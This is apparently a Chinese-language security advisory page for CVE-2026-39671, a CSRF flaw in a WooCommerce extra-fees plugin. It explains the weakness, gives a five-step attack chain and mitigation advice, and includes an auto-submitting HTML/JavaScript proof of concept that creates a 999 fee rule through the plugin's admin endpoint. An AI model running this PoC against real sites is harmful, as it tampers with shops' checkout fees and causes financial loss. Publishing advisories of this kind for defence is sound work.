IPBUF安全漏洞报告
English
CVE-2026-39671 CVSS 7.1 高危

CVE-2026-39671 WooCommerce Extra Fees插件CSRF漏洞

披露日期: 2026-04-08

漏洞信息

漏洞编号
CVE-2026-39671
漏洞类型
CSRF (跨站请求伪造)
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Extra Fees Plugin for WooCommerce

相关标签

CSRFWooCommerceWordPressWeb SecurityHigh Severity

漏洞概述

该漏洞存在于Dotstore开发的WooCommerce Extra Fees插件(woo-conditional-product-fees-for-checkout)中。由于缺乏足够的CSRF保护机制,攻击者可以诱导已认证的管理员用户在不知情的情况下执行恶意操作。受影响的版本包括4.3.3及以下所有版本。成功利用此漏洞可能导致插件配置被篡改,进而影响电商网站的结账流程和费用计算,对网站完整性和可用性造成威胁。

技术细节

CVE-2026-39671 是典型的跨站请求伪造(CSRF)漏洞。在Web应用中,CSRF利用了网站信任用户浏览器的特性。该Extra Fees插件在处理关键管理操作(如添加、修改或删除产品费用规则)时,未验证请求的来源是否合法,即缺少CSRF Token或Referer检查。攻击者可以构造一个恶意的HTML页面或链接,其中包含指向插件管理接口的HTTP POST请求。当管理员用户在登录状态下点击该链接或访问该页面时,浏览器会自动携带管理员的有效Session Cookie发送请求。由于服务器端无法区分请求是管理员主动发起还是由第三方站点伪造,因此会执行该操作,导致数据完整性受损或服务可用性下降。

攻击链分析

STEP 1
侦察
攻击者确认目标网站使用了存在漏洞的WooCommerce Extra Fees插件版本(<= 4.3.3)。
STEP 2
制作
攻击者构建包含恶意HTTP请求的HTML页面,该请求旨在修改插件设置(如添加高额费用),并利用社会工程学手段诱导管理员点击。
STEP 3
交付
攻击者通过电子邮件或即时通讯工具将恶意链接发送给目标网站的管理员。
STEP 4
利用
管理员在未登出后台的情况下点击链接,浏览器自动发送带有管理员凭证的请求至服务器。
STEP 5
影响
服务器接收并执行请求,导致插件配置被篡改,可能破坏网站结账功能或造成经济损失。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<html> <!-- CSRF PoC for CVE-2026-39671 --> <body> <script> // Function to submit the form automatically function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://target-site.com/wp-admin/admin.php?page=wc_conditional_product_fees", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Payload to create a malicious fee rule (example parameters) var params = "fee_name=HackedFee&fee_amount=999&fee_status=active&action=save"; xhr.send(params); } // Execute on load, simulating user interaction requirement (UI:R) window.onload = function() { alert("CSRF Attack Simulation: Click OK to trigger."); submitRequest(); }; </script> </body> </html>

影响范围

Extra Fees Plugin for WooCommerce <= 4.3.3

防御指南

临时缓解措施
建议管理员立即检查并更新插件。在更新前,应避免在登录后台时点击不明链接。若无法立即更新,可临时禁用该插件以防被自动化攻击利用,并配置Web应用防火墙(WAF)规则以拦截异常的管理请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表